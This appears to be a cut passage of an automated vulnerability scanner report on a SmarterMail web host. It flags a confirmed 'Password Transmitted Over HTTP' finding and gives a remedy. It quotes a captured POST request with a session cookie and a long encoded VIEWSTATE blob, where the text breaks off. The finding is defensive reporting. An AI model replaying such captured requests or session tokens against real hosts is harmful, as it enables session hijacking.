NlSUQGCgAAAAdAQWN0aXZlAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAIcHZBY3RpdmULZAUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFGGN0bDAwJEJQSCRjaGtTaG93QXRMb2dpbgUaY3RsMDAkTVBIJGdyZEFjdGl2ZURldmljZXMPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkvXrzJNslqQhhPjNEy454T+k4z/o=" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"&..
Password Transmitted Over HTTP
Password Transmitted Over HTTP
1
TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.
Impact
If an attacker can intercept network traffic he/she can steal users credentials.
Actions to Take
- See the remedy for solution.
- Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
|
- /Main/frmMySettings.aspx
/Main/frmMySettings.aspx CONFIRMED |
Form target action
frmMySettings.aspx
Request
POST /Main/frmMySettings.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmMySettings.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Content-Length: 23673
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=%2fwEPDwUKLTMwNTY1MDYyMA8WBB4QX19fUmVzdWx0RmFpbHVyZQU3VGhlIHBhc3N3b3JkIGdpdmVuIGFzIHRoZSBjdXJyZW50IHBhc3N3b3JkIGlzIG5vdCB2YWxpZB4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYKAgMPZBYCAgEPZBYCAgMPDxYCHgdWaXNpYmxlaGRkAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HwJoZAIGDxYCHwJoZAIHD2QWAmYPZBYCAgEPFgIfAmcWAgIBDxYCHgRUZXh0BbQBPGRpdiBjbGFzcz0iVGlwVGV4dEZhaWx1cmUiPjxpbWcgc3JjPSIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9JY29ucy9UaXBUZXh0L0ZhaWx1cmUuZ2lmIiBhbHQ9IiIvIGFsaWduPSJhYnNtaWRkbGUiPiBUaGUgcGFzc3dvcmQgZ2l2ZW4gYXMgdGhlIGN1cnJlbnQgcGFzc3dvcmQgaXMgbm90IHZhbGlkPC9kaXY%2bZAIJD2QWAgIBD2QWAmYPZBYCAgEPZBYCZg9kFgwCAg9kFgICAQ9kFihmDw8WAh4KX19yZWFkT25seWdkFgICAQ9kFgICAg8PFgIfBAUFZHVtbXlkZAIBDw8WAh8CaGQWAgIBD2QWAmYPEGQQFQILU21hcnRlck1haWwQQWN0aXZlIERpcmVjdG9yeRUCATABMRQrAwJnZxYBZmQCAg8PFgIfAmhkFgICAQ9kFgRmDw8WAh8EZWRkAgIPDxYCHwRlZGQCAw8PFgIfAmhkFgICAQ9kFgRmDw8WAh8EBQdMTDEyMzQ1ZGQCAg8PFgIfBAUHTEwxMjM0NWRkAgQPZBYCAgEPZBYCZg8PZBYCHgxhdXRvY29tcGxldGUFA29mZmQCBQ9kFgICAQ9kFgJmDw9kFgIfBgUDb2ZmZAIGD2QWAgIBD2QWAmYPD2QWAh8GBQNvZmZkAgcPZBYCAgEPZBYCAgIPDxYCHwQFEWR1bW15QGhveXRsbGMuY29tZGQCCA9kFgICAQ9kFgICAg8PFgIfBGVkZAIJD2QWAgIBD2QWAmYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE9sZCYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldxsoR01ULTA2OjAwKSBDZW50cmFsIEFtZXJpY2EmKEdNVC0wNTowMCkgRWFzdGVybiBUaW1lIChVUyAmIENhbmFkYSkaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkrKEdNVC0wNTowMCkgQm9nb3RhLCBMaW1hLCBRdWl0bywgUmlvIEJyYW5jbxMoR01ULTA0OjMwKSBDYXJhY2FzEihHTVQtMDQ6MDApIE1hbmF1cyIoR01ULTA0OjAwKSBBdGxhbnRpYyBUaW1lIChDYW5hZGEpEihHTVQtMDQ6MDApIExhIFBhehQoR01ULTA0OjAwKSBTYW50aWFnbxgoR01ULTAzOjMwKSBOZXdmb3VuZGxhbmQkKEdNVC0wMzowMCkgQnVlbm9zIEFpcmVzLCBHZW9yZ2V0b3duFShHTVQtMDM6MDApIEdyZWVubGFuZBQoR01ULTAzOjAwKSBCcmFzaWxpYRYoR01ULTAzOjAwKSBNb250ZXZpZGVvGChHTVQtMDI6MDApIE1pZC1BdGxhbnRpYxIoR01ULTAxOjAwKSBBem9yZXMaKEdNVC0wMTowMCkgQ2FwZSBWZXJkZSBJcy4lKEdNVCkgQ2FzYWJsYW5jYSwgTW9ucm92aWEsIFJleWtqYXZpaz0oR01UKSBHcmVlbndpY2ggTWVhbiBUaW1lIDogRHVibGluLCBFZGluYnVyZ2gsIExpc2JvbiwgTG9uZG9uPShHTVQrMDE6MDApIEJlbGdyYWRlLCBCcmF0aXNsYXZhLCBCdWRhcGVzdCwgTGp1YmxqYW5hLCBQcmFndWUsKEdNVCswMTowMCkgU2FyYWpldm8sIFNrb3BqZSwgV2Fyc2F3LCBaYWdyZWIvKEdNVCswMTowMCkgQnJ1c3NlbHMsIENvcGVuaGFnZW4sIE1hZHJpZCwgUGFyaXM8KEdNVCswMTowMCkgQW1zdGVyZGFtLCBCZXJsaW4sIEJlcm4sIFJvbWUsIFN0b2NraG9sbSwgVmllbm5hHyhHTVQrMDE6MDApIFdlc3QgQ2VudHJhbCBBZnJpY2EnKEdNVCswMjowMCkgQXRoZW5zLCBCdWNoYXJlc3QsIElzdGFuYnVsEihHTVQrMDI6MDApIEJlaXJ1dBEoR01UKz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VyD01hcmsgYXMgRGVsZXRlZBhNYXJrIGFzIERlbGV0ZWQgYW5kIEhpZGUVBAEwATEBMgEzFCsDBGdnZ2dkZAIEDw8WAh8CaGQWAgIBD2QWAmYPEGQPFgFmFgEQBQdEZWZhdWx0BQdEZWZhdWx0ZxYBZmQCBQ9kFgICAQ9kFgJmDxBkEBUDBkJvdHRvbQpSaWdodCBTaWRlCERpc2FibGVkFQMGYm90dG9tBXJpZ2h0CGRpc2FibGVkFCsDA2dnZ2RkAgsPZBYCAgEPZBYCZg8QDxYCHwdnZGRkZAIKD2QWAgIBD2QWEGYPZBYCAgEPZBYCZg8QZBAVAgRIVE1MBFRleHQVAgRodG1sBXBsYWluFCsDAmdnZGQCAQ9kFgICAQ9kFgRmDxBkEBUKBUFyaWFsB0NvdXJpZXIHR2VvcmdpYQZMdWNpZGEOTHVjaWRhIENvbnNvbGUIUGFsYXRpbm8GVGFob21hBVRpbWVzCVRyZWJ1Y2hldAdWZXJkYW5hFQocQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZhZDb3VyaWVyIE5ldywgbW9ub3NwYWNlDkdlb3JnaWEsIHNlcmlmLkx1Y2lkYSBTYW5zIFVuaWNvZGUsIEx1Y2lkYSBHcmFuZGUsIHNhbnMtc2VyaWYhTHVjaWRhIENvbnNvbGUsIE1vbmFjbywgbW9ub3NwYWNlMFBhbGF0aW5vIExpbm90eXBlLCBCb29rIEFudGlxdWEsIFBhbGF0aW5vLCBzZXJpZhpUYWhvbWEsIEdlbmV2YSwgc2Fucy1zZXJpZh1UaW1lcyBOZXcgUm9tYW4sIFRpbWVzLCBzZXJpZhhUcmVidWNoZXQgTVMsIHNhbnMtc2VyaWYlVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZhQrAwpnZ2dnZ2dnZ2dnZGQCAg8QZBAVBgM4cHQDOXB0BDEwcHQEMTJwdAQxNHB0BDE2cHQVBgM4cHQDOXB0BDEwcHQEMTJwdAQxNHB0BDE2cHQUKwMGZ2dnZ2dnZGQCAg9kFgICAQ9kFgJmDxBkEBUjDEFyYWJpYyAoSVNPKRBBcmFiaWMgKFdpbmRvd3MpDEJhbHRpYyAoSVNPKRBCYWx0aWMgKFdpbmRvd3MpFkNlbnRyYWwgRXVyb3BlYW4gKElTTykaQ2VudHJhbCBFdXJvcGVhbiAoV2luZG93cykcQ2hpbmVzZSBTaW1wbGlmaWVkIChHQjE4MDMwKRtDaGluZXNlIFNpbXBsaWZpZWQgKEdCMjMxMikXQ2hpbmVzZSBTaW1wbGlmaWVkIChIWikaQ2hpbmVzZSBUcmFkaXRpb25hbCAoQmlnNSkOQ3lyaWxsaWMgKElTTykRQ3lyaWxsaWMgKEtPSTgtUikRQ3lyaWxsaWMgKEtPSTgtVSkSQ3lyaWxsaWMgKFdpbmRvd3MpC0dyZWVrIChJU08pD0dyZWVrIChXaW5kb3dzKRBIZWJyZXcgKFdpbmRvd3MpFUhld2JyZXcgKElTTy1Mb2dpY2FsKQ5KYXBhbmVzZSAoSklTKSBKYXBhbmVzZSAoSklTLUFsbG93IDEgYnl0ZSBLYW5hKRRKYXBhbmVzZSAoU2hpZnQtSklTKQZLb3JlYW4MS29yZWFuIChFVUMpDEtvcmVhbiAoSVNPKQ1MYXRpbiAzIChJU08pDUxhdGluIDkgKElTTykOVGhhaSAoV2luZG93cykNVHVya2lzaCAoSVNPKRFUdXJraXNoIChXaW5kb3dzKQ9Vbmljb2RlIChVVEYtNykPVW5pY29kZSAoVVRGLTgpCFVTLUFTQ0lJFFZpZXRuYW1lc2UgKFdpbmRvd3MpIFdlc3Rlcm4gRXVyb3BlYW4gKElTTykgKGRlZmF1bHQpGldlc3Rlcm4gRXVyb3BlYW4gKFdpbmRvd3MpFSMFMjg1OTYEMTI1NgUyODU5NAQxMjU3BTI4NTkyBDEyNTAFNTQ5MzYDOTM2BTUyOTM2Azk1MAUyODU5NQUyMDg2NgUyMTg2NgQxMjUxBTI4NTk3BDEyNTMEMTI1NQUzODU5OAU1MDIyMAU1MDIyMQM5MzIDOTQ5BTUxOTQ5BTUwMjI1BTI4NTkzBTI4NjA1Azg3NAUyODU5OQQxMjU0BTY1MDAwBTY1MDAxBTIwMTI3BDEyNTgFMjg1OTEEMTI1MhQrAyNnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAgMPZBYCAgEPZBYCZg8QZBAVAiJBdHRlbXB0IHRvIHVzZSBsYW5ndWFnZSBmcm9tIGxvZ2luF0VuZ2xpc2ggKFVuaXRlZCBTdGF0ZXMpFQIABWVuLVVTFCsDAmdnZGQCBA9kFgICAQ9kFgJmDxBkDxYDZgIBAgIWAxAFBk5vcm1hbAUGbm9ybWFsZxAFBFRleHQFBXBsYWluZxAFE0VtYmVkIGFzIEF0dGFjaG1lbnQFCmF0dGFjaG1lbnRnZGQCBQ9kFgICAQ9kFgJmDxBkDxYFZgIBAgICAwIEFgUQBQROb25lBQEwZxAFCDEgTWludXRlBQU2MDAwMGcQBQkyIE1pbnV0ZXMFBjEyMDAwMGcQBQkzIE1pbnV0ZXMFBjE4MDAwMGcQBQk1IE1pbnV0ZXMFBjMwMDAwMGdkZAIGD2QWAgIBD2QWAmYPEGQQFQIFQmFzaWMERnVsbBUCBUJhc2ljBEZ1bGwUKwMCZ2dkZAIHD2QWAgIBD2QWAgICDw8WAh8EBQE%2bZGQCDg9kFgICAQ9kFgRmDw8WAh8CaGQWAgIBD2QWBmYPDxYCHwQFBDUwMDBkZAICDw8WAh8EBQQ1MDAwZGQCAw8QDxYCHwdoZGRkZAIBDw8WAh8CaGQWAgIBD2QWBmYPDxYCHwQFAzEwMGRkAgIPDxYCHwQFAzEwMGRkAgMPEA8WAh8HaGRkZGQYBgUdY3RsMDAkVFBIJFRhYlN0cmlwJHRhYkNvbXBvc2UPMt0LAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAhAQ29tcG9zZQH1%2f%2f%2f%2f%2fP%2f%2f%2fwYMAAAACFNlbGVjdGVkCAEAAfP%2f%2f%2f%2f8%2f%2f%2f%2fBg4AAAAKUGFnZVZpZXdJRAYPAAAAEXB2Q29tcG9zZVNldHRpbmdzC2QFHWN0bDAwJFRQSCRUYWJTdHJpcCR0YWJEaXNwbGF5DzL%2bCwABAAAA%2f%2f%2f%2f%2fwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2f%2f%2f%2fkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2f%2f%2f%2f8%2f%2f%2f%2fBgcAAAAEVGV4dAoB%2bP%2f%2f%2f%2fz%2f%2f%2f8GCQAAAApSZXNvdXJjZUlEBgoAAAApVXNlckNvbnRyb2xzLlVzZXJTZXR0aW5nc19EaXNwbGF5U2V0dGluZ3MB9f%2f%2f%2f%2fz%2f%2f%2f8GDAAAAAhTZWxlY3RlZAgBAAHz%2f%2f%2f%2f%2fP%2f%2f%2fwYOAAAAClBhZ2VWaWV3SUQGDwAAABFwdkRpc3BsYXlTZXR0aW5ncwtkBSFjdGwwMCRUUEgkVGFiU3RyaXAkdGFiUGx1c0FkZHJlc3MPMvwLAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDd